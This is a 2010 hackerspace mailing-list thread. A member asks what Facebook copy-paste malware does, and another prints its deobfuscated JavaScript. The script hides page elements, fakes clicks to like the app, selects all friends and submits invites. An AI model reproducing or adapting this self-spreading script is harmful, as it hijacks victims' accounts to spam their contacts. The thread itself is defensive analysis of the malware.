[Noisebridge-discuss] What does this Facebook javascript malware do?

Brian Ferrell endenizen at gmail.com
Fri May 7 18:55:59 UTC 2010


For the curious... DON'T RUN THIS!

Looks like it does just what you expect - 'likes' the app and suggests
it to all your friends.

document.getElementById('app117185681648577_cWsFYs').style = 'hidden';
document.getElementById('app117185681648577_TPCCax').innerHTML =
document.getElementById('app117185681648577_YbDOrx').value;
s = document.getElementById('suggest');
m = document.getElementById('likeme');
c = document.createEvent('MouseEvents');
c.initEvent('click', true, true);
s.dispatchEvent(c);

setTimeout(function() {
  fs.select_all();
}, 5000);

setTimeout(function() {
  SocialGraphManager.submitDialog('sgm_invite_form',
'/ajax/social_graph/invite_dialog.php');
}, 5000);

setTimeout(function() {
  m.dispatchEvent(c);
  document.getElementById('app117185681648577_wNPOwN').innerHTML =
document.getElementById('app117185681648577_djzaef').value;
}, 5000);

On Fri, May 7, 2010 at 11:30, Lee Sonko <lee at lee.org> wrote:
> A friend received this Facebook malware. It told her to copy and paste the
> malware below into her browser. She did :-(
>
>
>
> She tells me that it then pulled up a Facebook page and invited all her
> Facebook friends to the malware page.
>
>
>
> Can you, the javascript enabled hacker tell what it does? I'm guessing the
> RexExp runs a substitution cipher on that long string of characters but I'm
> lost from there.
>
>
>
> I've been watching the number of "People Like This" on the page grow from
> 1,000 to 1,500 in the past 20 minutes.   :-(
>
>
>
>
>
> Find it at http://lee.org/temp/malware.txt
>
>
>
>
>
> Lee
>
> _______________________________________________
> Noisebridge-discuss mailing list
> Noisebridge-discuss at lists.noisebridge.net
> https://www.noisebridge.net/mailman/listinfo/noisebridge-discuss
>
>



More information about the Noisebridge-discuss mailing list